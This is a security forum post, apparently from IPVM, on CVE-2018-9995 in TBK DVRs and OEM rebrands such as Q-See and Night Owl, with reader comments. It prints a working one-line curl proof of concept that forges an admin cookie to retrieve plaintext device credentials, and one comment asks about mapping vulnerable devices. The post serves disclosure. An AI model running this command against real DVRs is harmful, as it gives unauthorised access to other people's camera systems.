Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.
The DVRs affected are manufacturer by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).

The plain text credentials returned from this command granted admin access to the device.
opt=user&cmd=list
Obviously they really tried hard to hide this backdoor ;)
Do they have a businesses presence in the US?

TBK is Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Coscto, and more.

05/03/18 08:31pm
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?

05/10/18 08:06pm
Manufactured by TBK, a spanish company? Are they really manufactured in a spanish country?
Those dvr’s were designed and manufactured by Streamax, China.
Newest Discussions
Discussion | Posts | Latest |
---|---|---|
Started by
Undisclosed Integrator #1
|
47
|
less than a minute by Undisclosed Integrator #10 |
Started by
Undisclosed Integrator #1
|
1
|
less than a minute by Undisclosed Integrator #1 |
Started by
Joern Windler
|
9
|
about 2 hours by Chris Lanier |
Started by
Donald Maye
|
211
|
less than a minute by Donald Maye |
Started by
Tien Phong
|
1
|
2 minutes by Tien Phong |